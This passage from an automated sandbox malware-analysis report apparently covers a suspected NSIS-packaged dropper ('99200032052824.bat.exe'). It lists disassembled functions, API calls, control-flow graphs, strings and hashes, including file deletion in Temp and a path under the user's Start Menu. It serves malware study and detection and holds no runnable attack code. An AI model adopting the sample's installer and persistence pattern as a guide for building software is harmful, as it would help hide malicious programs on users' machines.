                              • Part of subcall function 004056BC: MessageBoxIndirectA.USER32(0040A218), ref: 00405717
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                            • String ID: "$"C:\Users\user\Desktop\99200032052824.bat.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand$C:\Users\user\Desktop$C:\Users\user\Desktop\99200032052824.bat.exe$Error launching installer$Inquiring Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                            • API String ID: 3776617018-1469225168
                            • Opcode ID: 9161ca9a5d85e359970b7cee058ae04b75de6ebf09e6b580f2889a559d4e6eb6
                            • Instruction ID: 947ab88924f8c3b38e2aea5cfaab7316d1dfac26a51a196f62222c0ed64aafcd
                            • Opcode Fuzzy Hash: 9161ca9a5d85e359970b7cee058ae04b75de6ebf09e6b580f2889a559d4e6eb6
                            • Instruction Fuzzy Hash: EEC1D470604741AAD7216F759E89B2F3EACAF45706F44053FF581B61E2CB7C8A058B2E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 134 405205-405221 135 4053b0-4053b6 134->135 136 405227-4052ee GetDlgItem * 3 call 404074 call 404965 GetClientRect GetSystemMetrics SendMessageA * 2 134->136 138 4053e0-4053ec 135->138 139 4053b8-4053da GetDlgItem CreateThread FindCloseChangeNotification 135->139 158 4052f0-40530a SendMessageA * 2 136->158 159 40530c-40530f 136->159 141 40540e-405414 138->141 142 4053ee-4053f4 138->142 139->138 143 405416-40541c 141->143 144 405469-40546c 141->144 146 4053f6-405409 ShowWindow * 2 call 404074 142->146 147 40542f-405436 call 4040a6 142->147 148 405442-405452 ShowWindow 143->148 149 40541e-40542a call 404018 143->149 144->147 152 40546e-405474 144->152 146->141 155 40543b-40543f 147->155 156 405462-405464 call 404018 148->156 157 405454-40545d call 4050c7 148->157 149->147 152->147 160 405476-405489 SendMessageA 152->160 156->144 157->156 158->159 163 405311-40531d SendMessageA 159->163 164 40531f-405336 call 40403f 159->164 165 405586-405588 160->165 166 40548f-4054bb CreatePopupMenu call 405fc2 AppendMenuA 160->166 163->164 173 405338-40534c ShowWindow 164->173 174 40536c-40538d GetDlgItem SendMessageA 164->174 165->155 171 4054d0-4054e6 TrackPopupMenu 166->171 172 4054bd-4054cd GetWindowRect 166->172 171->165 175 4054ec-405506 171->175 172->171 176 40535b 173->176 177 40534e-405359 ShowWindow 173->177 174->165 178 405393-4053ab SendMessageA * 2 174->178 179 40550b-405526 SendMessageA 175->179 180 405361-405367 call 404074 176->180 177->180 178->165 179->179 181 405528-405548 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 40554a-40556a SendMessageA 181->183 183->183 184 40556c-405580 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->165
                            APIs
                            • GetDlgItem.USER32(?,00000403), ref: 00405264
                            • GetDlgItem.USER32(?,000003EE), ref: 00405273
                            • GetClientRect.USER32(?,?), ref: 004052B0
                            • GetSystemMetrics.USER32(00000002), ref: 004052B7
                            • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                            • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                            • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                            • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                            • ShowWindow.USER32(?,00000008), ref: 00405353
                            • GetDlgItem.USER32(?,000003EC), ref: 00405374
                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                            • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                            • GetDlgItem.USER32(?,000003F8), ref: 00405282
                              • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,?,00403EA4), ref: 00404082
                            • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053DA
                            • ShowWindow.USER32(00000000), ref: 004053FD
                            • ShowWindow.USER32(?,00000008), ref: 00405404
                            • ShowWindow.USER32(00000008), ref: 0040544A
                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                            • CreatePopupMenu.USER32 ref: 0040548F
                            • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004054A4
                            • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                            • OpenClipboard.USER32(00000000), ref: 00405529
                            • EmptyClipboard.USER32 ref: 0040552F
                            • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                            • GlobalLock.KERNEL32(00000000), ref: 00405542
                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                            • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                            • SetClipboardData.USER32(?,00000000), ref: 0040557A
                            • CloseClipboard.USER32 ref: 00405580
                            Strings
                            • Inquiring Setup: Installing, xrefs: 004054F5
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                            • String ID: Inquiring Setup: Installing
                            • API String ID: 4154960007-1906667377
                            • Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                            • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                            • Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                            • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 493 405768-40578e call 405a26 496 405790-4057a2 DeleteFileA 493->496 497 4057a7-4057ae 493->497 500 405931-405935 496->500 498 4057b0-4057b2 497->498 499 4057c1-4057d1 call 405fa0 497->499 501 4057b8-4057bb 498->501 502 4058df-4058e4 498->502 506 4057e0-4057e1 call 40597f 499->506 507 4057d3-4057de lstrcatA 499->507 501->499 501->502 502->500 505 4058e6-4058e9 502->505 508 4058f3-4058fb call 4062a3 505->508 509 4058eb-4058f1 505->509 511 4057e6-4057e9 506->511 507->511 508->500 516 4058fd-405911 call 405938 call 405720 508->516 509->500 514 4057f4-4057fa lstrcatA 511->514 515 4057eb-4057f2 511->515 517 4057ff-40581d lstrlenA FindFirstFileA 514->517 515->514 515->517 532 405913-405916 516->532 533 405929-40592c call 4050c7 516->533 519 405823-40583a call 405963 517->519 520 4058d5-4058d9 517->520 527 405845-405848 519->527 528 40583c-405840 519->528 520->502 522 4058db 520->522 522->502 530 40584a-40584f 527->530 531 40585b-405869 call 405fa0 527->531 528->527 529 405842 528->529 529->527 534 405851-405853 530->534 535 4058b4-4058c6 FindNextFileA 530->535 543 405880-40588b call 405720 531->543 544 40586b-405873 531->544 532->509 537 405918-405927 call 4050c7 call 405d7f 532->537 533->500 534->531 539 405855-405859 534->539 535->519 541 4058cc-4058cf FindClose 535->541 537->500 539->531 539->535 541->520 553 4058ac-4058af call 4050c7 543->553 554 40588d-405890 543->554 544->535 546 405875-40587e call 405768 544->546 546->535 553->535 555 405892-4058a2 call 4050c7 call 405d7f 554->555 556 4058a4-4058aa 554->556 555->535 556->535
                            APIs
                            • DeleteFileA.KERNELBASE(?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
                            • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
                            • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
                            • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
                            • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,75A83410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                            • FindClose.KERNEL32(00000000), ref: 004058CF
                            Strings
                            • \*.*, xrefs: 004057D3
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
                            • "C:\Users\user\Desktop\99200032052824.bat.exe", xrefs: 00405768
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: "C:\Users\user\Desktop\99200032052824.bat.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                            • API String ID: 2035342205-2991526125
                            • Opcode ID: 7e912b2a9802e711fa8d749573897b654c7dd4461800a881f88780f975a2d178
                            • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                            • Opcode Fuzzy Hash: 7e912b2a9802e711fa8d749573897b654c7dd4461800a881f88780f975a2d178
                            • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69
                            APIs
                            • CoCreateInstance.OLE32(0040851C,?,?,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,?,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                            Strings
                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand, xrefs: 00402193
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Quizs\Strand
                            • API String ID: 123533781-780878960
                            • Opcode ID: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
                            • Instruction ID: f4f88eda2e3132aa5920e2584167a74d80893369f9b2333c3bffcb98084fb778
                            • Opcode Fuzzy Hash: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
                            • Instruction Fuzzy Hash: 44510771A00208BFCB10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54
                            APIs
                            • FindFirstFileA.KERNELBASE(75A83410,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,75A83410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,75A83410,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
                            • FindClose.KERNEL32(00000000), ref: 004062BA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                            • Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
                            • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                            • Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC
                            APIs
                            • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: PrivateProfileString
                            • String ID:
                            • API String ID: 1096422788-0
                            • Opcode ID: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
                            • Instruction ID: 8e029bd2b2674609338b614665d9252e3eb93026fbeeab8b0acd3e0b98e79a96
                            • Opcode Fuzzy Hash: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
                            • Instruction Fuzzy Hash: 2EE0803090430479DB10AFA18E0AEAD35649F41714F144839F5507B0D1EEB544419B3D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 185 403b6b-403b7d 186 403b83-403b89 185->186 187 403cbe-403ccd 185->187 186->187 188 403b8f-403b98 186->188 189 403d1c-403d31 187->189 190 403ccf-403d17 GetDlgItem * 2 call 40403f SetClassLongA call 40140b 187->190 191 403b9a-403ba7 SetWindowPos 188->191 192 403bad-403bb0 188->192 194 403d71-403d76 call 40408b 189->194 195 403d33-403d36 189->195 190->189 191->192 197 403bb2-403bc4 ShowWindow 192->197 198 403bca-403bd0 192->198 203 403d7b-403d96 194->203 200 403d38-403d43 call 401389 195->200 201 403d69-403d6b 195->201 197->198 204 403bd2-403be7 DestroyWindow 198->204 205 403bec-403bef 198->205 200->201 222 403d45-403d64 SendMessageA 200->222 201->194 202 40400c 201->202 210 40400e-404015 202->210 208 403d98-403d9a call 40140b 203->208 209 403d9f-403da5 203->209 211 403fe9-403fef 204->211 213 403bf1-403bfd SetWindowLongA 205->213 214 403c02-403c08 205->214 208->209 218 403fca-403fe3 DestroyWindow EndDialog 209->218 219 403dab-403db6 209->219 211->202 217 403ff1-403ff7 211->217 213->210 220 403cab-403cb9 call 4040a6 214->220 221 403c0e-403c1f GetDlgItem 214->221 217->202 224 403ff9-404002 ShowWindow 217->224 218->211 219->218 225 403dbc-403e09 call 405fc2 call 40403f * 3 GetDlgItem 219->225 220->210 226 403c21-403c38 SendMessageA IsWindowEnabled 221->226 227 403c3e-403c41 221->227 222->210 224->202 255 403e13-403e4f ShowWindow KiUserCallbackDispatcher call 404061 EnableWindow 225->255 256 403e0b-403e10 225->256 226->202 226->227 230 403c43-403c44 227->230 231 403c46-403c49 227->231 235 403c74-403c79 call 404018 230->235 232 403c57-403c5c 231->232 233 403c4b-403c51 231->233 236 403c92-403ca5 SendMessageA 232->236 238 403c5e-403c64 232->238 233->236 237 403c53-403c55 233->237 235->220 236->220 237->235 241 403c66-403c6c call 40140b 238->241 242 403c7b-403c84 call 40140b 238->242 251 403c72 241->251 242->220 252 403c86-403c90 242->252 251->235 252->251 259 403e51-403e52 255->259 260 403e54 255->260 256->255 261 403e56-403e84 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e86-403e97 SendMessageA 261->262 263 403e99 261->263 264 403e9f-403ed9 call 404074 call 403b4c call 405fa0 lstrlenA call 405fc2 SetWindowTextA call 401389 262->264 263->264 264->203 275 403edf-403ee1 264->275 275->203 276 403ee7-403eeb 275->276 277 403f0a-403f1e DestroyWindow 276->277 278 403eed-403ef3 276->278 277->211 280 403f24-403f51 CreateDialogParamA 277->280 278->202 279 403ef9-403eff 278->279 279->203 281 403f05 279->281 280->211 282 403f57-403fae call 40403f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 280->282 281->202 282->202 287 403fb0-403fc3 ShowWindow call 40408b 282->287 289 403fc8 287->289 289->211
                            APIs
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                            • ShowWindow.USER32(?), ref: 00403BC4
                            • DestroyWindow.USER32 ref: 00403BD8
                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                            • GetDlgItem.USER32(?,?), ref: 00403C15
                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                            • IsWindowEnabled.USER32(00000000), ref: 00403C30
                            • GetDlgItem.USER32(?,?), ref: 00403CDE
                            • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                            • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D53
                            • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                            • ShowWindow.USER32(00000000,?), ref: 00403E1A
                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
                            • EnableWindow.USER32(?,?), ref: 00403E47
                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E5D
                            • EnableMenuItem.USER32(00000000), ref: 00403E64
                            • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E7C
                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                            • lstrlenA.KERNEL32(Inquiring Setup: Installing,?,Inquiring Setup: Installing,00000000), ref: 00403EB9
                            • SetWindowTextA.USER32(?,Inquiring Setup: Installing), ref: 00403EC8
                            • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1296160787179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1296160761397.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160814291.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296160841920.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000005.00000002.1296161046107.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_99200032052824.jbxd
                            Similarity
                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                            • String ID: Inquiring Setup: Installing
                            • API String ID: 3282139019-1906667377
                            • Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                            • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                            • Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                            • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 290 4037ce-4037e6 call 406338 293 4037e8-4037f8 call 405efe 290->293 294 4037fa-40382b call 405e87 290->294 303 40384e-403877 call 403a93 call 405a26 293->303 299 403843-403849 lstrcatA 294->299 300 40382d-40383e call 405e87 294->300 299->303 300->299 308 40387d-403882 303->308 309 4038fe-403906 call 405a26 303->309 308->309 311 403884-4038a8 call 405e87 308->311 315 403914-403939 LoadImageA 309->315 316 403908-40390f call 405fc2 309->316 311->309 317 4038aa-4038ac 311->317 319 4039ba-4039c2 call 40140b 315->319 320 40393b-40396b RegisterClassA 315->320 316->315 321 4038bd-4038c9 lstrlenA 317->321 322 4038ae-4038bb call 405963 317->322 333 4039c4-4039c7 319->333 334 4039cc-4039d7 call 403a93 319->334 323 403971-4039b5 SystemParametersInfoA CreateWindowExA 320->323 324 403a89 320->324 328 4038f1-4038f9 call 405938 call 405fa0 321->328 329 4038cb-4038d9 lstrcmpiA 321->329 322->321 323->319 327 403a8b-403a92 324->327 328->309 329->328 332 4038db-4038e5 GetFileAttributesA 329->332 336 4038e7-4038e9 332->336 337 4038eb-4038ec call 40597f 332->337 333->327 343 403a60-403a61 call 405199 334->343 344 4039dd-4039f7 ShowWindow call 4062ca 334->344 336->328 336->337 337->328 348 403a66-403a68 343->348 349 403a03-403a15 GetClassInfoA 344->349 350 4039f9-4039fe call 4062ca 344->350 351 403a82-403a84 call 40140b 348->351 352 403a6a-403a70 348->352 355 403a17-403a27 GetClassInfoA RegisterClassA 349->355 356 403a2d-403a50 DialogBoxParamA call 40140b 349->356 350->349 351->324 352->333 357 403a76-403a7d call 40140b 352->357 355->356 361 403a55-403a5e call 40371e 356->361 357->333 361->327
                            APIs
                              • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                              • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                            • lstrcatA.KERNEL32(1033,Inquiring Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inquiring Setup: Installing,00000000,00000002,75A83410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\99200032052824.bat.exe",00000000), ref: 00403849
                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort,1033,Inquiring Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Inquiring Setup: Installing,00000000,00000002,75A83410), ref: 004038BE
                            • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                            • GetFileAttributesA.KERNEL32(Call), ref: 004038DC
                            • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort), ref: 00403925
                              • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                            • RegisterClassA.USER32(0042EBA0), ref: 00403962
                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                            • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                            • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                            • RegisterClassA.USER32(0042EBA0), ref: 00403A27
